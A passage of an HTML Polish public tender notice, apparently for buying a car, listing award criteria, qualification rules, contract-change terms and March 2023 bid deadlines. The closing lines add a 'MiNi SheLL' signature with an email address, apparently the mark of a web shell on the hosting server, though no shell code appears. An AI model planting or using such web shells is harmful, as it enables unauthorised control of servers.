sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) pełnomocnictw;<br/>2) oświadczenia – załącznik nr 1 do SWZ i oświadczenia – załącznik nr 2 do SWZ<br/>3) zobowiązań podmiotów trzecich, na których zasoby powołuje się wykonawca, do oddania do dyspozycji wykonawcy tych<br/>zasobów na potrzeby realizacji zamówienia, lub innych podmiotowych środków dowodowych potwierdzających, że<br/>wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Z zastrzeżeniem ust. 4, wszelkie zmiany postanowień Umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2. Zamawiający przewiduje możliwość dokonania zmian postanowień Umowy w stosunku do treści oferty, na podstawie<br/>której dokonano wyboru Wykonawcy, jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie<br/>mającym wpływ na realizację przedmiotu Umowy, bez zmiany ceny netto samochodu, o której mowa w § 4 ust. 1.<br/>3. Wykonawca nie może przenieść na osoby trzecie swoich praw i obowiązków wynikających z Umowy bez zgody<br/>Zamawiającego.<br/>4. Zmiana osób odpowiedzialnych za potwierdzenie prawidłowej realizacji przedmiotu Umowy oraz osób wyznaczonych<br/>przez Wykonawcę do realizacji przedmiotu Umowy, wraz z numerami telefonów, faksów, adresów poczty elektronicznej,<br/>adresów korespondencyjnych, nie wymaga dla swej skuteczności podpisania aneksu do Umowy. Dla skuteczności takich<br/>zmian wystarczające jest pisemne, w tym za pośrednictwem poczty elektronicznej lub faksu, powiadomienie drugiej Strony z<br/>zachowaniem odpowiednich terminów. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-02 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-02 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com